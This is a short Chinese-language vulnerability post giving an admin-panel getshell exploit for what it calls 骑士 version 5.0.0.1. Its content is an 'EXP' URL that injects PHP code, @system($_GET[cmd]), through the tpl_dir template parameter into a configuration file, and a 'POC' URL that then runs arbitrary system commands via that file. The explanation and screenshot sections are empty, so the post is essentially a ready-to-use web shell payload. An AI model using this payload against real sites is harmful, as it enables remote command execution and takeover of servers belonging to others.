骑士最新版本V 5.0.0.1后台getshell
EXP:
http://127.0.0.1/index.php?m=Admin&c=Tpl&a=set&tpl_dir= ', 'a',@system($_GET[cmd]),'
POC:
http://127.0.0.1/Application/Home/Conf/config.php?cmd= (系统命令)
上图:


成因:


http://127.0.0.1/index.php?m=Admin&c=Tpl&a=set&tpl_dir= ', 'a',@system($_GET[cmd]),'
http://127.0.0.1/Application/Home/Conf/config.php?cmd= (系统命令)